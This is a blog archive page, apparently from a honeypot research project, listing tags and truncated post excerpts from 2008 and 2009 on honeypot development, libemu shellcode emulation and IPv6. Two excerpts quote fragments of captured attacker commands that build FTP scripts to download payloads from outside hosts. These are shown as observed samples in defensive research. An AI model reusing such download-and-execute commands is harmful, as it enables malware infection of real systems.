- Filter by
- Categories
- Tags
- Authors
- Show all
- All
- Analysis
- Android
- Chapters
- Data-Mining
- Encryption
- Forensic Challenges
- Google Summer of Code
- Honeypot
- Know Your Enemy
- News
- Uncategorized
- Workshop
- All
- 2010
- 2018
- 6guard
- active defense
- Active Response Continuum
- activities
- afterglow
- afterglow cloud
- aggressive network defense
- ajgamma.liveblog.com
- AliIkinci
- Analysis
- android
- annual
- annual status report
- anti-debugging
- APIMonitor
- APK
- APKinspector android malware static analysis
- ARE
- arp spoof
- Art
- ASLR
- assembly
- attack
- Attack Graph
- Attribution
- axis
- beginner
- Beta
- Bifrozt
- blogging
- botnet
- botnet monitoring
- botnet protocols
- Botnets
- browsers under attack
- c++
- canberra
- capture-hpc
- capture-hpc honeyclient honeyspider
- carberp
- CEO
- CFG
- challenge
- challenge 2
- chapter
- Citadel
- civil process
- client
- clustering
- code of conduct
- Computer Fraud and Abuse Act
- conference
- conficker
- conpot
- control flow
- counter-attack
- criminal process
- cro
- Crowdstrike
- cuckoo
- cuckoo sandbox androguard gsoc
- cuckoo sandbox malware analysis
- d3.v2
- Dalvik
- Damballa
- data
- data link layer attacks
- data mining
- Data model Honeyweb tutorial
- data visualization
- dbscan
- DDoS
- DDOS Honeypot
- debian
- decompilation
- demo
- DEP
- dependencies
- detect
- detection
- dhcp starvation
- dionaea
- Django
- Docker
- Dorothy
- downadup
- dpkt
- droidbot
- droidbox
- dubai
- dubai2013
- Dynamic
- dynamic analysis
- dynamic malware analysis virtuaization cuckoo gsoc
- EAT filtering
- emet
- Emulation
- encrypted traffic
- encryption
- ethics
- exploit
- exploit replay
- explot
- FC10
- feature
- Feature 1
- flash
- flow
- focus
- Forensic Challenge
- Forensic Challenge 2010
- forensic challenges
- forensics
- format
- framework
- framework honeypot
- frontend
- ftp
- Fuzzy hashing
- GeoDjango
- georg
- Ghost
- glaspot
- glastopf
- GlastopNG
- globalpot
- google summer of code
- Graphviz
- greedybear
- gsoc
- gsoc 2012
- GSoC 2013
- gsoc glutton
- gsoc google
- gsoc gsoc2010
- gsoc gsoc2011
- gsoc snare tanner
- GSoC11
- GSOC2011
- gsoc2011 gsoc
- gsoc2012
- gsoc2013
- gsoc2014
- gsoc2015
- gsoc2016
- gsoc2017
- gsoc2018
- gsoc2020
- GUI
- hack back
- Hackback
- Hacking Back
- Heralding
- HeX
- high interaction honeypot
- hnw2015
- HNW2016
- honeybrid gsoc introduction
- honeybrid gsoc parser
- honeybrid gsoc redirection
- honeybrid gsoc testing
- honeyclient
- honeydrive
- honeymap
- honeyned
- honeynet
- Honeynet Blogs
- honeypot
- honeypots
- honeysink
- honeywall
- honeyweb
- Hong Kong
- Hook
- hpfeeds
- HPSoC
- hpw2012 workshop norman
- HPW2015
- http https proxy gsoc honeyproxy forensics
- hugo gonzalez
- humanitarian law
- ICS
- images
- Imalse
- improper ruse
- infection monkey
- integrity
- intelowl
- interesting
- ipv6
- IRB
- Iteolih
- Iteolih Samba DCERPC Python
- Iteolih Samba DCERPC Python libemu
- Kelihos
- Kelihos.B/Hlux.B
- kippo
- kippo SSH honeypot
- kmeans
- KYE
- KYT
- Law
- law of war
- Layer 2
- layout
- legal
- lessons learned
- libemu
- link-local
- linux
- log record
- logging
- logs
- low-interaction
- Lukas Rist
- MAC flood
- machine learning
- mahmud
- Main blog
- Malaysian Honeynet chapter
- malicious
- malware
- Malware
- malware sandbox cuckoo
- Mariposa
- Meet our new CEO Andre
- Mexican Chapter Annual Report
- Microsoft
- mitmproxy
- Mobile
- mobile HosTage
- mohpt
- Monday
- monthly
- murofet
- nebula
- network
- network traffic
- New Honeynet Project Challenge (#7): Forensic Analysis of a Compromised Server
- new version
- news
- Norway
- oxff
- paper
- parallel coordinates
- parser
- peepdf
- phoneyc
- phoneyc paper leet09 honeyclient
- picviz
- project
- project news
- protocol
- protocols
- publication
- python
- qebek
- qebek sebek qemu windows
- qebek windows
- qebek windows socket network
- qemu
- qemu hook
- qemu qebek
- question
- re-google
- readables
- reading
- release
- replay
- replica bags
- report
- reports
- research
- reverse engineering
- reversing
- ROP
- rumal
- Sambacry
- San Antonio
- sandbox
- sandbox evasion
- SCADA
- scan
- scanner
- sebek
- sebek visualization
- security
- shellcode
- shockpot
- signature
- Simpilified Chinese
- Simplified Chinese
- Simulation
- sink
- sinkhole
- smartphone
- snare
- snort
- social honeypots
- social networks
- spam
- spamscope
- spanish chapter
- speak
- spidermonkey
- splunk
- statistic
- statistics
- status
- Stavanger
- stix
- Storm Worm
- Stormfucker
- STP manipulation
- student
- Symantec
- taiwan
- takedown
- talk
- Tallinn Manual
- tanner
- taxii
- The Italian Honeynet Chapter
- the Menlo Report
- threatintel
- thug
- thug-vagrant
- tool
- tpot
- traceexploit
- Traditional Chinese
- traffic analyze
- translation
- trojan
- twman
- UI framework
- UK Chapter
- update
- vagrant
- Video
- visualization
- vlan hopping
- vulnerabilities
- Waledac
- Wannacry
- web honeypot
- web server botnet
- webhoneypot
- webservice
- White Paper
- windows
- wireshark
- wireshnork
- wordpot
- workshop
- workshop 2012 facebook
- workshop facebook
- worldmap
- zeus
- zoom
- 繁體中文
- 鑑識分析挑戰
- 香港
August 11, 2009
Published by Markus Koetter at August 11, 2009
Categories
Uncategorized
We got a new milestone due: 10.08.2009 thread-pool works stream recording works shellcode detection using libemu works shellcode emulation using libemu works compiles on linux&openbsd An […]
July 26, 2009
Published by Markus Koetter at July 26, 2009
Categories
Uncategorized
Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this: WinExec("cmd /c echo open 78.1.96.200 4871 > […]
July 21, 2009
Published by Markus Koetter at July 21, 2009
Categories
Uncategorized
While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo […]
June 5, 2009
Published by Markus Koetter at June 5, 2009
Categories
Hello, due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are […]
May 24, 2009
Published by Markus Koetter at May 24, 2009
Categories
As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The ‘testsuite’ is a c core […]
December 10, 2008
Published by Markus Koetter at December 10, 2008
Categories
As libemu had it’s second release (0.2.0) lately, I’ll try to introduce it to the audience who did not hear about it yet. libemu is a […]
October 20, 2008
Published by Markus Koetter at October 20, 2008
Categories
Uncategorized
I’ve been looking on ipv6 lately, and even though I got a global /64 for free from he.net, I’m not that amused about ipv6 yet. ipv6 […]